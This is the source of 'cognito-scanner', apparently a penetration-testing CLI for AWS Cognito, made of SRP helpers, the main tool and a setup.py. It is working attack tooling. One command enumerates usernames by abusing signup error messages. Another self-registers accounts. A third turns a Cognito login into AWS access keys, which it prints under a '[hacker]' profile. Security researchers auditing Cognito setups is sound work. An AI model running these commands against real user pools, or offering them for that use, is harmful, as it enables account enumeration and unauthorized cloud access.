import binascii
import os
import six
import hashlib
import hmac

info_bits = bytearray('Caldera Derived Key', 'utf-8')

def hash_sha256(buf):
    """AuthenticationHelper.hash"""
    a = hashlib.sha256(buf).hexdigest()
    return (64 - len(a)) * '0' + a


def hex_hash(hex_string):
    return hash_sha256(bytearray.fromhex(hex_string))


def hex_to_long(hex_string):
    return int(hex_string, 16)


def long_to_hex(long_num):
    return '%x' % long_num


def get_random(nbytes):
    random_hex = binascii.hexlify(os.urandom(nbytes))
    return hex_to_long(random_hex)


def pad_hex(long_int):
    """
    Converts a Long integer (or hex string) to hex format padded with zeroes for hashing
    :param {Long integer|String} long_int Number or string to pad.
    :return {String} Padded hex string.
    """
    if not isinstance(long_int, six.string_types):
        hash_str = long_to_hex(long_int)
    else:
        hash_str = long_int
    if len(hash_str) % 2 == 1:
        hash_str = '0%s' % hash_str
    elif hash_str[0] in '89ABCDEFabcdef':
        hash_str = '00%s' % hash_str
    return hash_str


def compute_hkdf(ikm, salt):
    """
    Standard hkdf algorithm
    :param {Buffer} ikm Input key material.
    :param {Buffer} salt Salt value.
    :return {Buffer} Strong key material.
    @private
    """
    prk = hmac.new(salt, ikm, hashlib.sha256).digest()
    info_bits_update = info_bits + bytearray(chr(1), 'utf-8')
    hmac_hash = hmac.new(prk, info_bits_update, hashlib.sha256).digest()
    return hmac_hash[:16]


def calculate_u(big_a, big_b):
    """
    Calculate the client's value U which is the hash of A and B
    :param {Long integer} big_a Large A value.
    :param {Long integer} big_b Server B value.
    :return {Long integer} Computed U value.
    """
    u_hex_hash = hex_hash(pad_hex(big_a) + pad_hex(big_b))
    return hex_to_long(u_hex_hash)


#!/usr/bin/env python3
#encoding: utf-8

import boto3
import typer
import threading

from concurrent import futures
from typing_extensions import Annotated

from .AWSSRP import AWSSRP

# CLI tool
cli = typer.Typer()

client_id_option = typer.Option('--client_id',help='Client ID')
region_option = typer.Option('--region',help='Region')
secret_hash_option = typer.Option('--secret',help='(Optionnal) Client secret for connection')

# Priviledge escalation to get creds to connect to AWS
@cli.command(help="Get Identity Pool Keys")
def get_identity_pool_keys(
    region: Annotated[str, region_option] = 'eu-west-3',
    pool_id: Annotated[str, typer.Option('--pool_id',help='Pool ID')] = '',
    identity_pool_id: Annotated[str, typer.Option('--identity_pool_id',help='Identity pool ID')] = '',
    client_id: Annotated[str, client_id_option] = '',
    username: Annotated[str, typer.Option('--username',help='Username')] = '',
    password: Annotated[str, typer.Option('--password',help='Password')] = '',
    secret_hash: Annotated[str, secret_hash_option] = None,
):

    # Create SRP object
    srp = AWSSRP(
        username=username, 
        password=password, 
        pool_id=pool_id, 
        client_id=client_id, 
        pool_region=region,
        client_secret=secret_hash
    )

    # Get authenticated IdToken
    resp = srp.authenticate_user()
    token = resp['AuthenticationResult']['IdToken']
    logins = {
    f'cognito-idp.{region}.amazonaws.com/{pool_id}' : token
    }

    # Get Identity id
    identity_client = boto3.client('cognito-identity', region_name=region)
    resp = identity_client.get_id(
        IdentityPoolId=identity_pool_id,
        Logins=logins
    )
    identity_id = resp['IdentityId']

    # Get AWS credentials from Pool
    resp = identity_client.get_credentials_for_identity(
        IdentityId=identity_id,
        Logins=logins
    )
    credentials = resp['Credentials']

    # Print result
    access_key = credentials['AccessKeyId']
    secret_key = credentials['SecretKey']
    secret_token = credentials['SessionToken']

    print('[hacker]')
    print('output = json')
    print('aws_access_key_id = %s' % access_key)
    print('aws_secret_access_key = %s' % secret_key)
    print('aws_session_token = %s' % secret_token)


# Create a new account using cognito provider
@cli.command(help="Create new user account")
def account_creation(
    region: Annotated[str, region_option] = 'eu-west-3',
    user_attributes: Annotated[str, typer.Option('--user_attributes',help='User attributes (email of the user)')] = '',
    client_id: Annotated[str, client_id_option] = '',
    username: Annotated[str, typer.Option('--username',help='Username')] = '',
    password: Annotated[str, typer.Option('--password',help='Password')] = '',
    secret_hash: Annotated[str, secret_hash_option] = None,
):
    # Check that mail is passed correctly
    if not user_attributes or user_attributes == '':
        raise ValueError('You need to pass the user attributes. Type --help for more information')
    
    # Create SRP object
    srp = AWSSRP(
        username=username, 
        password=password, 
        pool_id=None, 
        client_id=client_id,
        user_attributes=user_attributes,
        pool_region=region,
        client_secret=secret_hash
    )

    # Signup user
    confirmed, sub = srp.signup_user()

    print('{')
    print("\tUserConfirmed:", confirmed)
    print("\tUserSub:", sub)
    print('}')
    print("/!\ If you received a confirmation mail to sign up, you can confirm it using the confirm-sign-up subcommand")

# Confirm the sign up user
@cli.command(help="Confirm sign up of user")
def confirm_sign_up(
    client_id: Annotated[str, client_id_option] = '',
    region: Annotated[str, region_option] = 'eu-west-3',
    username: Annotated[str, typer.Option('--username',help='Username')] = '',
    confirmation_code: Annotated[str, typer.Option('--code',help='Confirmation code')] = '',
    secret_hash: Annotated[str, secret_hash_option] = None,
):
    # Check that confirmation code is passed correctly
    if not confirmation_code or confirmation_code == '':
        raise ValueError('Need confirmation code')
    
    # Create SRP object
    srp = AWSSRP(
        username=username, 
        password=None, 
        pool_id=None, 
        client_id=client_id,
        pool_region=region,
        client_secret=secret_hash
    )

    print(srp.confirm_signup(confirmation_code))

# Check that the usernames passed exist in cognito user pool
def check_account(    
    username: str,
    client_id: str,
    region: str,
    pool: futures.ThreadPoolExecutor,
    lock: threading.Lock,
    boto_client: boto3.client,
    secret_hash: str,
):
    try:
        srp = AWSSRP(
            username=username, 
            password='R4nd0mP4$$w0rd',
            pool_id=None, 
            client_id=client_id,
            pool_region=region,
            user_attributes='test@fakemail.com',
            client_secret=secret_hash
        )

        try:
            srp.signup_user(boto_client)
        except Exception as error:
            # If users already exists, write the username in the report file
            if 'User already exists' in str(error):
                lock.acquire()
                with open('existing_users.txt', 'a') as file:
                    file.write(username+'\n')
                lock.release()
 
    except Exception as error:
        pool.shutdown(wait=False, cancel_futures=True)
        print(error)

# Check for existing user in Cognito user pool
@cli.command(help="Check for existing accounts on cognito idp")
def account_oracle(
    client_id: Annotated[str, client_id_option] = '',
    region: Annotated[str, region_option] = 'eu-west-3',
    file: Annotated[str, typer.Option('--file', metavar='<path>', help='file which contains usernames',)] = '',
    secret_hash: Annotated[str, secret_hash_option] = None,
):
    # Check that a file containing the usernames is passed
    if not file or file == '':
        raise ValueError('Type a path file using --file arg')

    # Initialize the threads
    lock = threading.Lock()
    pool = futures.ThreadPoolExecutor(max_workers=5)
   
    with open('existing_users.txt', 'w') as f:
        f.write('Users found in cognito user pool :\n')

    with open(file, 'r') as f:
        boto_client = boto3.client('cognito-idp', region_name=region)
        for username in f:
            pool.submit(check_account, username.strip(), client_id, region, pool, lock, boto_client, secret_hash)
        pool.shutdown(wait=True)
    
    print('Users found available in the file ./existing_users.txt')

if __name__ == "__main__":
    cli()


from setuptools import setup, find_packages

setup(
    name='cognito-scanner',
    version='1.0.0',
    packages=find_packages(),
    install_requires=[
        "boto3", "typer"
    ],
    entry_points={
        'console_scripts': [
            'cognito-scanner = scanner.scanner:cli',
        ],
    },
    authors = [ { 'name': "Thibault Lengagne", 'email': 'thibaultl@padok.fr' }, { 'name':"Clement Fgs", 'email':'clementfa@padok.fr' }, ],
    description="A simple script which implements different Cognito attacks such as Account Oracle or Priviledge Escalation",
    readme="README.md",
    author_email='thibaultl@padok.fr',
    url='https://github.com/padok-team/cognito-scanner',
    license='Apache2',
)
